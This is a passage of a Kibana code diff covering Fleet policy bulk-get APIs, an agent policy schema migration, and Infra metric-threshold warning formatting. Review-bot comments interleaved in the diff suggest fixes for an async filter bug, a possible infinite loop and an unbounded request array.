policy_revision_idx: 1, last_checkin: new Date().toISOString(), local_metadata: {}, user_provided_metadata: {}, 
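Review bot: The `.filter` in `ensureFleetServerAgentPoliciesExists` is given an `async` callback, which returns a Promise — always truthy — so every policy passes and is redeployed on each setup; the predicate is also inverted relative to the removed code, which deployed only when `getLatestFleetPolicy` returned nothing. Resolve the lookups first with `Promise.all`, then filter synchronously on the results. The function's signature is outside the hunk.
```typescript
  const latestFleetPolicies = await Promise.all(
    agentPolicies.map((agentPolicy) =>
      agentPolicyService.getLatestFleetPolicy(esClient, agentPolicy.id)
    )
  );
  // Deploy only the policies that have no document in .fleet-policies yet.
  const outdatedAgentPolicyIds = agentPolicies
    .filter((_, index) => !latestFleetPolicies[index])
    .map((agentPolicy) => agentPolicy.id);

  await agentPolicyService.deployPolicies(soClient, outdatedAgentPolicyIds);
```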
@@ -92,6 +93,7 @@ describe('Agent status service', () => { _source: { active: true, last_checkin: new Date(Date.now() - 10 * AGENT_POLLING_THRESHOLD_MS - 1000).toISOString(), + policy_revision_idx: 2, local_metadata: {}, user_provided_metadata: {}, }, diff --git a/x-pack/plugins/fleet/server/services/package_policy.ts b/x-pack/plugins/fleet/server/services/package_policy.ts index ecdff37854b27..0e9c2fda047d1 100644 --- a/x-pack/plugins/fleet/server/services/package_policy.ts +++ b/x-pack/plugins/fleet/server/services/package_policy.ts @@ -54,6 +54,7 @@ import { PackagePolicyIneligibleForUpgradeError, PackagePolicyValidationError, PackagePolicyRestrictionRelatedError, + PackagePolicyNotFoundError, } from '../errors'; import { NewPackagePolicySchema, PackagePolicySchema, UpdatePackagePolicySchema } from '../types'; import type { @@ -293,7 +294,8 @@ class PackagePolicyService implements PackagePolicyServiceInterface { public async getByIDs( soClient: SavedObjectsClientContract, - ids: string[] + ids: string[], + options: { ignoreMissing?: boolean } = {} ): Promise { const packagePolicySO = await soClient.bulkGet( ids.map((id) => ({ @@ -305,11 +307,25 @@ class PackagePolicyService implements PackagePolicyServiceInterface { return null; } - return packagePolicySO.saved_objects.map((so) => ({ - id: so.id, - version: so.version, - ...so.attributes, - })); + return packagePolicySO.saved_objects + .map((so): PackagePolicy | null => { + if (so.error) { + if (options.ignoreMissing && so.error.statusCode === 404) { + return null; + } else if (so.error.statusCode === 404) { + throw new PackagePolicyNotFoundError(`Package policy ${so.id} not found`); + } else { + throw new Error(so.error.message); + } + } + + return { + id: so.id, + version: so.version, + ...so.attributes, + }; + }) + .filter((packagePolicy): packagePolicy is PackagePolicy => packagePolicy !== null); } public async list( 
@@ -1265,7 +1281,11 @@ export interface PackagePolicyServiceInterface { get(soClient: SavedObjectsClientContract, id: string): Promise; - getByIDs(soClient: SavedObjectsClientContract, ids: string[]): Promise; + getByIDs( + soClient: SavedObjectsClientContract, + ids: string[], + options?: { ignoreMissing?: boolean } + ): Promise; list( soClient: SavedObjectsClientContract, diff --git a/x-pack/plugins/fleet/server/services/setup.test.ts b/x-pack/plugins/fleet/server/services/setup.test.ts index ba32b15533c20..34336f8167316 100644 --- a/x-pack/plugins/fleet/server/services/setup.test.ts +++ b/x-pack/plugins/fleet/server/services/setup.test.ts @@ -58,6 +58,8 @@ describe('setupFleet', () => { }); (upgradeManagedPackagePolicies as jest.Mock).mockResolvedValue([]); + + soClient.find.mockResolvedValue({ saved_objects: [] } as any); }); afterEach(async () => { diff --git a/x-pack/plugins/fleet/server/services/setup.ts b/x-pack/plugins/fleet/server/services/setup.ts index f3a802e81739d..e9b26e50735b9 100644 --- a/x-pack/plugins/fleet/server/services/setup.ts +++ b/x-pack/plugins/fleet/server/services/setup.ts @@ -41,6 +41,7 @@ import type { UpgradeManagedPackagePoliciesResult } from './managed_package_poli import { upgradeManagedPackagePolicies } from './managed_package_policies'; import { getBundledPackages } from './epm/packages'; import { upgradePackageInstallVersion } from './setup/upgrade_package_install_version'; +import { upgradeAgentPolicySchemaVersion } from './setup/upgrade_agent_policy_schema_version'; export interface SetupStatus { isInitialized: boolean; @@ -130,6 +131,9 @@ async function createSetupSideEffects( logger.debug('Upgrade Fleet package install versions'); await upgradePackageInstallVersion({ soClient, esClient, logger }); + logger.debug('Upgrade Agent policy schema version'); + await upgradeAgentPolicySchemaVersion(soClient); + logger.debug('Setting up Fleet enrollment keys'); await ensureDefaultEnrollmentAPIKeysExists(soClient, esClient); 
diff --git a/x-pack/plugins/fleet/server/services/setup/index.ts b/x-pack/plugins/fleet/server/services/setup/index.ts index 1646e501c8cab..a360a59a13930 100644 --- a/x-pack/plugins/fleet/server/services/setup/index.ts +++ b/x-pack/plugins/fleet/server/services/setup/index.ts @@ -6,3 +6,4 @@ */ export { upgradePackageInstallVersion } from './upgrade_package_install_version'; +export { upgradeAgentPolicySchemaVersion } from './upgrade_agent_policy_schema_version'; diff --git a/x-pack/plugins/fleet/server/services/setup/upgrade_agent_policy_schema_version.ts b/x-pack/plugins/fleet/server/services/setup/upgrade_agent_policy_schema_version.ts new file mode 100644 index 0000000000000..a02c81c2cfab1 --- /dev/null +++ b/x-pack/plugins/fleet/server/services/setup/upgrade_agent_policy_schema_version.ts 
@@ -0,0 +1,38 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+import type { SavedObjectsClientContract } from '@kbn/core/server';
+
+import {
+ AGENT_POLICY_SAVED_OBJECT_TYPE,
+ FLEET_AGENT_POLICIES_SCHEMA_VERSION,
+ SO_SEARCH_LIMIT,
+} from '../../constants';
+import { agentPolicyService } from '../agent_policy';
+
+function getOutdatedAgentPoliciesBatch(soClient: SavedObjectsClientContract) {
+ return agentPolicyService.list(soClient, {
+ perPage: SO_SEARCH_LIMIT,
+ kuery: `NOT ${AGENT_POLICY_SAVED_OBJECT_TYPE}.schema_version:${FLEET_AGENT_POLICIES_SCHEMA_VERSION}`,
+ });
+}
+
+// used to migrate ingest-agent-policies SOs to .fleet-policies
+// fetch SOs from ingest-agent-policies with outdated schema_version
+// deploy outdated policies to .fleet-policies index
+// bump oudated SOs schema_version
+export async function upgradeAgentPolicySchemaVersion(soClient: SavedObjectsClientContract) {
+ let outdatedAgentPolicies = await getOutdatedAgentPoliciesBatch(soClient);
+
+ while (outdatedAgentPolicies.total > 0) {
+ const outdatedAgentPolicyIds = outdatedAgentPolicies.items.map(
+ (outdatedAgentPolicy) => outdatedAgentPolicy.id
+ );
+ await agentPolicyService.deployPolicies(soClient, outdatedAgentPolicyIds);
+ outdatedAgentPolicies = await getOutdatedAgentPoliciesBatch(soClient);
+ }
+}
diff --git a/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts b/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts
index 1f793445bf630..c2599d79b3364 100644
--- a/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts
+++ b/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts
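Review bot: The `while (outdatedAgentPolicies.total > 0)` loop in `upgradeAgentPolicySchemaVersion` has no termination guard other than the query eventually returning zero results, and the loop relies on `agentPolicyService.deployPolicies` bumping `schema_version` on every policy it is handed (per the header comment). If any policy is skipped or left unbumped by `deployPolicies`, the same batch is returned on the next iteration and Fleet setup — which awaits this call in `createSetupSideEffects` — spins forever instead of failing. A cheap guard is to remember the previous batch's ids and throw when the same set comes back unchanged, so the problem surfaces as a setup error with the offending ids rather than a hung Kibana. The header comment also misspells `oudated`; `outdated` while you are there.
```typescript
// … unchanged: imports and getOutdatedAgentPoliciesBatch …
export async function upgradeAgentPolicySchemaVersion(soClient: SavedObjectsClientContract) {
  let outdatedAgentPolicies = await getOutdatedAgentPoliciesBatch(soClient);
  let previousBatch = '';

  while (outdatedAgentPolicies.total > 0) {
    const outdatedAgentPolicyIds = outdatedAgentPolicies.items.map(
      (outdatedAgentPolicy) => outdatedAgentPolicy.id
    );
    // deployPolicies is expected to bump schema_version on each SO; if it did not,
    // the same batch comes back on the next query and setup would never finish.
    // Fail loudly with the ids instead of spinning.
    const currentBatch = [...outdatedAgentPolicyIds].sort().join(',');
    if (currentBatch === previousBatch) {
      throw new Error(
        `Agent policy schema_version upgrade made no progress for policies: ${currentBatch}`
      );
    }
    previousBatch = currentBatch;

    await agentPolicyService.deployPolicies(soClient, outdatedAgentPolicyIds);
    outdatedAgentPolicies = await getOutdatedAgentPoliciesBatch(soClient);
  }
}
```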
@@ -9,7 +9,7 @@ import { schema } from '@kbn/config-schema'; import { NewAgentPolicySchema } from '../models'; -import { ListWithKuerySchema } from '.'; +import { ListWithKuerySchema, BulkRequestBodySchema } from './common'; export const GetAgentPoliciesRequestSchema = { query: ListWithKuerySchema.extends({ @@ -17,6 +17,12 @@ export const GetAgentPoliciesRequestSchema = { }), }; +export const BulkGetAgentPoliciesRequestSchema = { + body: BulkRequestBodySchema.extends({ + full: schema.maybe(schema.boolean()), + }), +}; + export const GetOneAgentPolicyRequestSchema = { params: schema.object({ agentPolicyId: schema.string(), diff --git a/x-pack/plugins/fleet/server/types/rest_spec/common.ts b/x-pack/plugins/fleet/server/types/rest_spec/common.ts index 2d12bd5d7c987..0c5f16ff87f90 100644 --- a/x-pack/plugins/fleet/server/types/rest_spec/common.ts +++ b/x-pack/plugins/fleet/server/types/rest_spec/common.ts @@ -22,4 +22,9 @@ export const ListWithKuerySchema = schema.object({ ), }); +export const BulkRequestBodySchema = schema.object({ + ids: schema.arrayOf(schema.string(), { minSize: 1 }), + ignoreMissing: schema.maybe(schema.boolean()), +}); + export type ListWithKuery = TypeOf; diff --git a/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts b/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts index b085060286d05..fa7cdce92400b 100644 --- a/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts +++ b/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts @@ -12,12 +12,16 @@ import { UpdatePackagePolicyRequestBodySchema, } from '../models'; -import { ListWithKuerySchema } from '.'; +import { ListWithKuerySchema, BulkRequestBodySchema } from './common'; export const GetPackagePoliciesRequestSchema = { query: ListWithKuerySchema, }; +export const BulkGetPackagePoliciesRequestSchema = { + body: BulkRequestBodySchema, +}; + export const GetOnePackagePolicyRequestSchema = { params: schema.object({ packagePolicyId: schema.string(), 
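Review bot: `BulkRequestBodySchema.ids` in `common.ts` has a lower bound (`minSize: 1`) but no upper bound, so a single bulk-get request body can carry an arbitrarily long id list that `getByIDs` then resolves against the saved-objects client; the same schema is reused for both agent-policy and package-policy bulk gets. I would cap it at the limit the plugin already uses for saved-object pagination, e.g. `ids: schema.arrayOf(schema.string({ minLength: 1 }), { minSize: 1, maxSize: SO_SEARCH_LIMIT })`, importing `SO_SEARCH_LIMIT` from the constants module (it is not imported in `common.ts` as far as this hunk shows). `minLength: 1` additionally rejects empty-string ids at validation time instead of passing them to the SO client.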
diff --git a/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx b/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx index bc7718b142231..6a3126c8617cb 100644 --- a/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx +++ b/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx @@ -63,7 +63,7 @@ export function FieldPicker({ aria-disabled={!hasFields} onClick={() => { if (hasFields) { - setOpen(true); + setOpen(!open); } }} onClickAriaLabel={badgeDescription} diff --git a/x-pack/plugins/infra/common/formatters/high_precision.ts b/x-pack/plugins/infra/common/formatters/high_precision.ts index 70e4d3a0d1796..d111d61346736 100644 --- a/x-pack/plugins/infra/common/formatters/high_precision.ts +++ b/x-pack/plugins/infra/common/formatters/high_precision.ts @@ -5,7 +5,7 @@ * 2.0. */ -export const formatHighPercision = (val: number) => { +export const formatHighPrecision = (val: number) => { return Number(val).toLocaleString('en', { maximumFractionDigits: 5, }); diff --git a/x-pack/plugins/infra/common/formatters/index.ts b/x-pack/plugins/infra/common/formatters/index.ts index 372df5b28ca1b..efa4f2faf769f 100644 --- a/x-pack/plugins/infra/common/formatters/index.ts +++ b/x-pack/plugins/infra/common/formatters/index.ts @@ -9,7 +9,7 @@ import { createBytesFormatter } from './bytes'; import { formatNumber } from './number'; import { formatPercent } from './percent'; import { InventoryFormatterType } from '../inventory_models/types'; -import { formatHighPercision } from './high_precision'; +import { formatHighPrecision } from './high_precision'; import { InfraWaffleMapDataFormat } from './types'; export const FORMATTERS = { @@ -22,7 +22,7 @@ export const FORMATTERS = { // bytes in bits formatted string out bits: createBytesFormatter(InfraWaffleMapDataFormat.bitsDecimal), percent: formatPercent, - highPercision: formatHighPercision, + highPrecision: formatHighPrecision, }; export const createFormatter = 
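Review bot: In `field_picker.tsx` the new `setOpen(!open)` toggles from the `open` value captured by the render closure, so two clicks dispatched before React re-renders would compute the same next value. The functional updater form, `setOpen((isOpen) => !isOpen)`, toggles from the latest committed state and is the conventional way to express a toggle. Minor, and `FieldPicker` itself starts and ends outside the hunk.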
diff --git a/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx b/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx index 3c52b6ec623d8..025119cff2f85 100644 --- a/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx +++ b/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx @@ -143,7 +143,7 @@ export const Layout = withTheme(({ metrics, onChangeRangeTime, theme }: LayoutPr ; export type InventoryItemType = rt.TypeOf; diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx index 260e082796464..2064be4f19612 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx @@ -59,27 +59,27 @@ export default { const loadedContainers: ContainerNodeMetricsRow[] = [ { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg1', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg1', averageCpuUsagePercent: 99, averageMemoryUsageMegabytes: 34, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg2', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg2', averageCpuUsagePercent: 72, averageMemoryUsageMegabytes: 68, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg3', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg3', averageCpuUsagePercent: 54, averageMemoryUsageMegabytes: 132, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg4', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg4', averageCpuUsagePercent: 34, averageMemoryUsageMegabytes: 264, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg5', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg5', averageCpuUsagePercent: 13, averageMemoryUsageMegabytes: 512, }, 
diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx index 92bff357f77db..2395e3bca195a 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx @@ -94,7 +94,7 @@ describe('ContainerMetricsTable', () => { isLoading={true} setCurrentPageIndex={jest.fn()} setSortState={jest.fn()} - sortState={{ field: 'name', direction: 'asc' }} + sortState={{ field: 'id', direction: 'asc' }} timerange={{ from: new Date().toISOString(), to: new Date().toISOString() }} /> @@ -113,7 +113,7 @@ describe('ContainerMetricsTable', () => { isLoading={false} setCurrentPageIndex={jest.fn()} setSortState={jest.fn()} - sortState={{ field: 'name', direction: 'asc' }} + sortState={{ field: 'id', direction: 'asc' }} timerange={{ from: new Date().toISOString(), to: new Date().toISOString() }} /> diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx index 74348d00f6f8f..c4273733aacb9 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx 
@@ -115,20 +115,15 @@ function containerNodeColumns( ): Array> { return [ { - name: i18n.translate('xpack.infra.metricsTable.container.nameColumnHeader', { - defaultMessage: 'Name', + name: i18n.translate('xpack.infra.metricsTable.container.idColumnHeader', { + defaultMessage: 'Id', }), - field: 'name', + field: 'id', truncateText: true, textOnly: true, - render: (name: string) => { + render: (id: string) => { return ( - + ); }, }, diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts index 411087113ca59..5f60d1751ee96 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts @@ -47,7 +47,7 @@ export const metricByField = createMetricByFieldLookup(containerMetricsQueryConf const unpackMetric = makeUnpackMetric(metricByField); export interface ContainerNodeMetricsRow { - name: string; + id: string; averageCpuUsagePercent: number | null; averageMemoryUsageMegabytes: number | null; } @@ -91,14 +91,14 @@ function seriesToContainerNodeMetricsRow(series: MetricsExplorerSeries): Contain } return { - name: series.id, + id: series.id, ...calculateMetricAverages(series.rows), }; } -function rowWithoutMetrics(name: string) { +function rowWithoutMetrics(id: string) { return { - name, + id, averageCpuUsagePercent: null, averageMemoryUsageMegabytes: null, }; 
@@ -148,7 +148,7 @@ function collectMetricValues(rows: MetricsExplorerRow[]) { }; } -function unpackMetrics(row: MetricsExplorerRow): Omit { +function unpackMetrics(row: MetricsExplorerRow): Omit { return { averageCpuUsagePercent: unpackMetric(row, 'kubernetes.container.cpu.usage.limit.pct'), averageMemoryUsageMegabytes: unpackMetric(row, 'kubernetes.container.memory.usage.bytes'), diff --git a/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx b/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx index e66191923e39a..56de138d19b51 100644 --- a/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx +++ b/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import React, { useContext, useMemo } from 'react'; import { ThrowReporter } from 'io-ts/lib/ThrowReporter'; import { UrlStateContainer } from '../../utils/url_state'; diff --git a/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx b/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx index 6f4b0e73f0c33..5ed7ab99b4a3e 100644 --- a/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx +++ b/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx @@ -11,7 +11,7 @@ import React from 'react'; import { Route, Router, Switch } from 'react-router-dom'; import { httpServiceMock } from '@kbn/core/public/mocks'; import { KibanaContextProvider } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { useLogView } from '../../hooks/use_log_view'; import { createLoadedUseLogViewMock, 
diff --git a/x-pack/plugins/infra/public/pages/logs/page_template.tsx b/x-pack/plugins/infra/public/pages/logs/page_template.tsx index 32a5be3e071c7..3fb8884f963c4 100644 --- a/x-pack/plugins/infra/public/pages/logs/page_template.tsx +++ b/x-pack/plugins/infra/public/pages/logs/page_template.tsx @@ -9,7 +9,7 @@ import React from 'react'; import { i18n } from '@kbn/i18n'; import type { LazyObservabilityPageTemplateProps } from '@kbn/observability-plugin/public'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; import { useKibanaContextForPlugin } from '../../hooks/use_kibana'; interface LogsPageTemplateProps extends LazyObservabilityPageTemplateProps { @@ -35,7 +35,7 @@ export const LogsPageTemplate: React.FC = ({ const { http } = useKibana().services; const basePath = http!.basePath.get(); - const noDataConfig: KibanaPageTemplateProps['noDataConfig'] = hasData + const noDataConfig: NoDataConfig | undefined = hasData ? undefined : { solution: i18n.translate('xpack.infra.logs.noDataConfig.solutionName', { diff --git a/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts b/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts index 7db25ae6898f1..a4e5cc4b92791 100644 --- a/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts +++ b/x-pack/plugins/infra/public/pages/metrics/metrics_explorer/components/helpers/create_tsvb_link.ts 
@@ -7,7 +7,7 @@ import { encode } from 'rison-node'; import uuid from 'uuid'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { LinkDescriptor } from '@kbn/observability-plugin/public'; import { TIMESTAMP_FIELD } from '../../../../../../common/constants'; import { MetricsSourceConfigurationProperties } from '../../../../../../common/metrics_sources'; diff --git a/x-pack/plugins/infra/public/pages/metrics/page_template.tsx b/x-pack/plugins/infra/public/pages/metrics/page_template.tsx index 53a0cc21dd7ce..4d4dec50dd74c 100644 --- a/x-pack/plugins/infra/public/pages/metrics/page_template.tsx +++ b/x-pack/plugins/infra/public/pages/metrics/page_template.tsx @@ -7,7 +7,7 @@ import { i18n } from '@kbn/i18n'; import type { LazyObservabilityPageTemplateProps } from '@kbn/observability-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; import React from 'react'; import { noMetricIndicesPromptDescription, @@ -33,7 +33,7 @@ export const MetricsPageTemplate: React.FC = ({ }, } = useKibanaContextForPlugin(); - const noDataConfig: KibanaPageTemplateProps['noDataConfig'] = hasData + const noDataConfig: NoDataConfig | undefined = hasData ? undefined : { solution: i18n.translate('xpack.infra.metrics.noDataConfig.solutionName', { diff --git a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts index 4f0060b3dddf2..08870ddfb6f94 100644 --- a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts +++ b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.test.ts 
@@ -29,6 +29,7 @@ import { createMetricThresholdExecutor, FIRED_ACTIONS, NO_DATA_ACTIONS, + WARNING_ACTIONS, } from './metric_threshold_executor'; import { Evaluation } from './lib/evaluate_rule'; import type { LogMeta, Logger } from '@kbn/logging'; 
@@ -1504,6 +1505,91 @@ describe('The metric threshold alert type', () => { expect(mostRecentAction(instanceID)).toBeErrorAction(); }); }); + + describe('querying the entire infrastructure with warning threshold', () => { + afterAll(() => clearInstances()); + const instanceID = '*'; + + const execute = () => + executor({ + ...mockOptions, + services, + params: { + sourceId: 'default', + criteria: [ + { + ...baseNonCountCriterion, + comparator: Comparator.GT, + threshold: [9999], + }, + ], + }, + }); + + const setResults = ({ + comparator = Comparator.GT, + threshold = [9999], + warningComparator = Comparator.GT, + warningThreshold = [2.49], + metric = 'test.metric.1', + currentValue = 7.59, + shouldWarn = false, + }) => + setEvaluationResults([ + { + '*': { + ...baseNonCountCriterion, + comparator, + threshold, + warningComparator, + warningThreshold, + metric, + currentValue, + timestamp: new Date().toISOString(), + shouldFire: false, + shouldWarn, + isNoData: false, + }, + }, + ]); + + test('warns as expected with the > comparator', async () => { + setResults({ warningThreshold: [2.49], currentValue: 2.5, shouldWarn: true }); + await execute(); + expect(mostRecentAction(instanceID)).toBeWarnAction(); + + setResults({ warningThreshold: [2.49], currentValue: 1.23, shouldWarn: false }); + await execute(); + expect(mostRecentAction(instanceID)).toBe(undefined); + }); + + test('reports expected warning values to the action context', async () => { + setResults({ warningThreshold: [2.49], currentValue: 2.5, shouldWarn: true }); + await execute(); + + const { action } = mostRecentAction(instanceID); + expect(action.group).toBe('*'); + expect(action.reason).toBe( + 'test.metric.1 is 2.5 in the last 1 min for all hosts. Alert when > 2.49.' 
+ ); + }); + + test('reports expected warning values to the action context for percentage metric', async () => { + setResults({ + warningThreshold: [0.81], + currentValue: 0.82, + shouldWarn: true, + metric: 'system.cpu.user.pct', + }); + await execute(); + + const { action } = mostRecentAction(instanceID); + expect(action.group).toBe('*'); + expect(action.reason).toBe( + 'system.cpu.user.pct is 82% in the last 1 min for all hosts. Alert when > 81%.' + ); + }); + }); }); const createMockStaticConfiguration = (sources: any) => ({ @@ -1622,6 +1708,14 @@ expect.extend({ pass, }; }, + toBeWarnAction(action?: Action) { + const pass = action?.id === WARNING_ACTIONS.id && action?.action.alertState === 'WARNING'; + const message = () => `expected ${JSON.stringify(action)} to be an WARNING action`; + return { + message, + pass, + }; + }, toBeNoDataAction(action?: Action) { const pass = action?.id === NO_DATA_ACTIONS.id && action?.action.alertState === 'NO DATA'; const message = () => `expected ${action} to be a NO DATA action`; @@ -1645,9 +1739,8 @@ declare global { namespace jest { interface Matchers { toBeAlertAction(action?: Action): R; - + toBeWarnAction(action?: Action): R; toBeNoDataAction(action?: Action): R; - toBeErrorAction(action?: Action): R; } } diff --git a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts index 2a77f7ca79beb..14b5fe8e75614 100644 --- a/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts +++ b/x-pack/plugins/infra/server/lib/alerting/metric_threshold/metric_threshold_executor.ts 
@@ -322,28 +322,32 @@ const formatAlertResult = ( alertResult; const noDataValue = i18n.translate( 'xpack.infra.metrics.alerting.threshold.noDataFormattedValue', - { - defaultMessage: '[NO DATA]', - } + { defaultMessage: '[NO DATA]' } ); - if (!metric.endsWith('.pct')) + const thresholdToFormat = useWarningThreshold ? warningThreshold! : threshold; + const comparatorToUse = useWarningThreshold ? warningComparator! : comparator; + + if (metric.endsWith('.pct')) { + const formatter = createFormatter('percent'); return { ...alertResult, - currentValue: currentValue ?? noDataValue, + currentValue: + currentValue !== null && currentValue !== undefined ? formatter(currentValue) : noDataValue, + threshold: Array.isArray(thresholdToFormat) + ? thresholdToFormat.map((v: number) => formatter(v)) + : formatter(thresholdToFormat), + comparator: comparatorToUse, }; - const formatter = createFormatter('percent'); - const thresholdToFormat = useWarningThreshold ? warningThreshold! : threshold; - const comparatorToFormat = useWarningThreshold ? warningComparator! : comparator; + } + const formatter = createFormatter('highPrecision'); return { ...alertResult, currentValue: - currentValue !== null && typeof currentValue !== 'undefined' - ? formatter(currentValue) - : noDataValue, + currentValue !== null && currentValue !== undefined ? formatter(currentValue) : noDataValue, threshold: Array.isArray(thresholdToFormat) ? thresholdToFormat.map((v: number) => formatter(v)) - : thresholdToFormat, - comparator: comparatorToFormat, + : formatter(thresholdToFormat), + comparator: comparatorToUse, }; }; diff --git a/x-pack/plugins/infra/server/lib/metrics/index.ts b/x-pack/plugins/infra/server/lib/metrics/index.ts index c4641e265ea55..54dd69adb3ff4 100644 --- a/x-pack/plugins/infra/server/lib/metrics/index.ts +++ b/x-pack/plugins/infra/server/lib/metrics/index.ts 
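Review bot: The new `thresholdToFormat`/`comparatorToUse` lines use non-null assertions (`warningThreshold!`, `warningComparator!`), and the restructured branches now pass `thresholdToFormat` straight into `formatter(...)`; if `useWarningThreshold` is ever true while `warningThreshold` is undefined, the high-precision path formats `Number(undefined)`, i.e. the alert reason would read "Alert when > NaN". Falling back to the firing `threshold`/`comparator` when the warning values are absent removes the `!` and the bad message, and the two return objects are otherwise identical apart from the formatter, so they can collapse into one. `formatAlertResult`'s signature and the destructuring of `alertResult` start above this hunk; whether callers guarantee the warning fields is not visible here, so treat the fallback as defensive.
```typescript
  // … unchanged: destructuring of alertResult and noDataValue …
  const formatter = createFormatter(metric.endsWith('.pct') ? 'percent' : 'highPrecision');
  // Fall back to the firing threshold/comparator instead of formatting `undefined`
  // (which renders as "NaN") when a warning result has no warning threshold set.
  const thresholdToFormat =
    useWarningThreshold && warningThreshold !== undefined ? warningThreshold : threshold;
  const comparatorToUse =
    useWarningThreshold && warningComparator !== undefined ? warningComparator : comparator;

  return {
    ...alertResult,
    currentValue:
      currentValue !== null && currentValue !== undefined ? formatter(currentValue) : noDataValue,
    threshold: Array.isArray(thresholdToFormat)
      ? thresholdToFormat.map((v: number) => formatter(v))
      : formatter(thresholdToFormat),
    comparator: comparatorToUse,
  };
```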
